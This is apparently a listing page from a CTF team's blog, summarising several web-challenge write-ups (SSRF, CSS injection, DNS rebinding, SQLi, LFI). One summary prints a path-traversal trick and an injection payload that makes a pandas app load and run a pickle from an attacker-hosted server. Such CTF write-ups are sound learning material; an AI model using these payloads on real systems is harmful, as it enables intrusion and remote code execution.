bi0s
  •  Home
  •  Categories
  •  Archives
  •  Tags
  •  Home
  •  Categories
  •  Archives
  •  Tags

Vuln-Drive 2 - bi0sCTF22

ma1f0y
2023-01-24
Web

tl;dr

  • SSRF using file_get_contents() and CRLF in ini_set()
  • basic Header quirks to bypass waf
  • sqli using column trick in SQLite to get the flag
Read More
CRLF SSRF bi0sCTF22 SQLi

Emo-Locker - bi0sCTF 2022

Yadhu Krishna
2023-01-23
Web

tl;dr
- CSS injection using url forging
- leaking password using :empty selectors

Read More
XSLeaks CSS injection

PYCGI-bi0sCTF22

Yadhu Krishna M
2023-01-23
Web

tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x’|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|' to execute the exploit

Read More
Panda RCE nginx misconfiguration

NarutoKeeper - Securinets CTF Quals 2022

ma1f0y
2022-04-14
Web

tl;dr

  • Create a note with meta redirect tag to get callback.
  • Leak the flag using search functionality.
Read More
XSS CSP SecurinetsCTFQuals XS-Leak

Vulpixelize - HITCON CTF 2021

Yadhu Krishna M
2021-12-05
Web

tl;dr

  • Use DNS Rebinding attack to read flag from /flag endpoint.
Read More
DNS Rebinding HITCONCTF

Vuln Drive - InCTF Internationals 2021

Rohit
2021-08-15
Web

tl;dr

  • /source to get the source
  • Access local host from dev_test using SSRF
  • SQLI to get the flag path a nd LFI to get the flag
Read More
InCTFi LFI SSRF SQLI

 Previous 

2 / 2

Official blog of team bi0s

  Projects
  •   bi0s-wargame
    (Unraveling)
  •   bi0s-wiki
    (Free Encyclopedia)
  •   InCTF
    (Nationals CTF)
  •   InCTFj
    (Juniors CTF)

Made With Love and Coffee



Blog content follows the Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License

Use Material X as theme, total visits times.